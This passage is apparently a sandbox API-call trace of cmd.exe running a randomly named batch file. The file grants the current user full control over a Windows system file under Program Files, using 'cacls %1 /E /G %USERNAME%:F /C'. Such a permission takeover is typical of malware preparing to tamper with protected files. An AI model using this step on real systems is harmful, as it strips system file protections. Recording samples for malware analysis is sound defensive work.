fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0f310) returned 0xdeb148 [0280.841] FindClose (in: hFindFile=0xdeb148 | out: hFindFile=0xdeb148) returned 1 [0280.841] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0280.841] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0280.841] GetConsoleTitleW (in: lpConsoleTitle=0xa0f7e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0280.842] ApiSetQueryApiSetPresence () returned 0x0 [0280.842] ResolveDelayLoadedAPI () returned 0x745414a0 [0280.843] SaferWorker () returned 0x0 [0280.859] SetErrorMode (uMode=0x0) returned 0x0 [0280.859] SetErrorMode (uMode=0x1) returned 0x0 [0280.859] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x104, lpBuffer=0xdead28, lpFilePart=0xa0f694 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0xa0f694*="vRnqNMBW.bat") returned 0x2a [0280.859] SetErrorMode (uMode=0x0) returned 0x1 [0280.859] wcsspn (_String=" \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"", _Control=" \x09") returned 0x1 [0280.859] CmdBatNotificationStub () returned 0x1 [0280.859] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa0f724, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0280.859] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0280.860] _get_osfhandle (_FileHandle=3) returned 0xb4 [0280.860] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0280.860] _get_osfhandle (_FileHandle=3) returned 0xb4 [0280.860] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0280.860] ReadFile (in: hFile=0xb4, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa0f6f4, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xa0f6f4*=0xe2, lpOverlapped=0x0) returned 1 [0280.860] SetFilePointer (in: hFile=0xb4, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0280.860] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=32, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0280.861] _get_osfhandle (_FileHandle=3) returned 0xb4 [0280.861] GetFileType (hFile=0xb4) returned 0x1 [0280.861] _get_osfhandle (_FileHandle=3) returned 0xb4 [0280.861] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0280.861] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="CIiHmnxMn6Ps") returned 0xc [0280.861] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0280.861] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0280.861] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0280.861] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0280.861] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0280.861] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0280.861] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0280.863] _tell (_FileHandle=3) returned 32 [0280.863] _close (_FileHandle=3) returned 0 [0280.863] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa0f4b8 | out: _Buffer="\r\n") returned 2 [0280.863] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.863] GetFileType (hFile=0x3c) returned 0x2 [0280.863] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.863] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f490 | out: lpMode=0xa0f490) returned 1 [0280.883] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.883] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa0f4a8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f4a8*=0x2) returned 1 [0280.884] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0280.884] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0280.884] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xa0f4b4 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0280.884] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xa0f4b4 | out: _Buffer=">") returned 1 [0280.884] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.884] GetFileType (hFile=0x3c) returned 0x2 [0280.884] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.884] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f494 | out: lpMode=0xa0f494) returned 1 [0280.884] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.884] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xa0f4ac, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xa0f4ac*=0x1e) returned 1 [0280.885] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.885] GetFileType (hFile=0x3c) returned 0x2 [0280.885] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.885] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f734 | out: lpMode=0xa0f734) returned 1 [0280.885] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.885] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xde7858*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0xa0f74c, lpReserved=0x0 | out: lpBuffer=0xde7858*, lpNumberOfCharsWritten=0xa0f74c*=0x5) returned 1 [0280.885] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa0f754 | out: _Buffer=" \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\" /E /G CIiHmnxMn6Ps:F /C ") returned 83 [0280.885] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.885] GetFileType (hFile=0x3c) returned 0x2 [0280.885] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.885] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f72c | out: lpMode=0xa0f72c) returned 1 [0280.886] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.886] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x53, lpNumberOfCharsWritten=0xa0f744, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f744*=0x53) returned 1 [0280.886] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa0f768 | out: _Buffer="\r\n") returned 2 [0280.886] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.886] GetFileType (hFile=0x3c) returned 0x2 [0280.886] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.886] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f740 | out: lpMode=0xa0f740) returned 1 [0280.886] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.886] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa0f758, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f758*=0x2) returned 1 [0280.893] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0280.893] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0280.893] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0280.893] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0280.893] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0280.893] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0280.893] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0280.893] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0280.893] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0280.893] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0280.893] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0280.893] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0280.893] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0280.893] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0280.893] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0280.893] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0280.893] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0280.893] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0280.893] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0280.893] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0280.893] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0280.893] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0280.893] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0280.893] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0280.894] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0280.894] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0280.894] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0280.894] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0280.894] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0280.894] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0280.894] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0280.894] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0280.894] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0280.894] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0280.894] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0280.894] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0280.894] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0280.894] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0280.894] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0280.894] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0280.894] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0280.894] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0280.894] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0280.894] SetErrorMode (uMode=0x0) returned 0x0 [0280.894] SetErrorMode (uMode=0x1) returned 0x0 [0280.894] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xdebe98, lpFilePart=0xa0f504 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xa0f504*="Desktop") returned 0x1d [0280.894] SetErrorMode (uMode=0x0) returned 0x1 [0280.894] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0280.894] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0280.896] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0280.896] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.896] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xa0f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0f290) returned 0xffffffff [0280.896] GetLastError () returned 0x2 [0280.896] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.896] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xa0f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0f290) returned 0xffffffff [0280.896] GetLastError () returned 0x2 [0280.896] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.896] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xa0f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0f290) returned 0xde0b68 [0280.896] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0280.897] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xa0f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0f290) returned 0xffffffff [0280.897] GetLastError () returned 0x2 [0280.897] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xa0f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0f290) returned 0xde0b68 [0280.897] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0280.897] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0280.897] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0280.897] GetConsoleTitleW (in: lpConsoleTitle=0xa0f2d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0280.918] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0280.918] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0280.918] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0280.918] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0280.918] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0280.918] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0280.918] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0280.918] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0280.918] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0280.918] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0280.918] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0280.918] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0280.918] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0280.918] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0280.918] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0280.918] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0280.918] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0280.918] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0280.918] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0280.918] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0280.918] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0280.918] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0280.918] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0280.918] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0280.918] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0280.918] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0280.918] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0280.919] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0280.919] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0280.919] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0280.919] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0280.919] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0280.919] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0280.919] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0280.919] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0280.919] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0280.919] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0280.919] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0280.919] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0280.919] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0280.919] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0280.919] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0280.919] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0280.919] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0280.919] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0280.919] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0280.919] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0280.919] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0280.919] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0280.919] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0280.919] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0280.919] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0280.919] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0280.919] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0280.919] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0280.919] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0280.919] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0280.919] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0280.919] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0280.919] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0280.919] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0280.919] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0280.919] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0280.919] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0280.919] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0280.919] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0280.919] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0280.919] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0280.919] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0280.919] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0280.919] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0280.919] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0280.919] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0280.919] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0280.919] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0280.919] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0280.919] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0280.920] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0280.920] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0280.920] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0280.920] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0280.920] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0280.920] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0280.920] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0280.920] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0280.920] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0280.920] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0280.920] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0280.920] SetErrorMode (uMode=0x0) returned 0x0 [0280.920] SetErrorMode (uMode=0x1) returned 0x0 [0280.920] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xdec518, lpFilePart=0xa0ede4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xa0ede4*="Desktop") returned 0x1d [0280.920] SetErrorMode (uMode=0x0) returned 0x1 [0280.920] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0280.920] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0280.920] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0280.920] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.920] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xa0eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0eb70) returned 0xffffffff [0280.921] GetLastError () returned 0x2 [0280.921] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.921] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xa0eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0eb70) returned 0xffffffff [0280.921] GetLastError () returned 0x2 [0280.921] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xa0eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0eb70) returned 0xde0b68 [0280.921] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0280.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xa0eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0eb70) returned 0xffffffff [0280.921] GetLastError () returned 0x2 [0280.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xa0eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0eb70) returned 0xde0b68 [0280.921] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0280.922] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0280.922] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0280.922] GetConsoleTitleW (in: lpConsoleTitle=0xa0f064, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0281.049] InitializeProcThreadAttributeList (in: lpAttributeList=0xa0ef90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa0ef74 | out: lpAttributeList=0xa0ef90, lpSize=0xa0ef74) returned 1 [0281.049] UpdateProcThreadAttribute (in: lpAttributeList=0xa0ef90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa0ef7c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa0ef90, lpPreviousValue=0x0) returned 1 [0281.049] GetStartupInfoW (in: lpStartupInfo=0xa0efc8 | out: lpStartupInfo=0xa0efc8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0281.050] 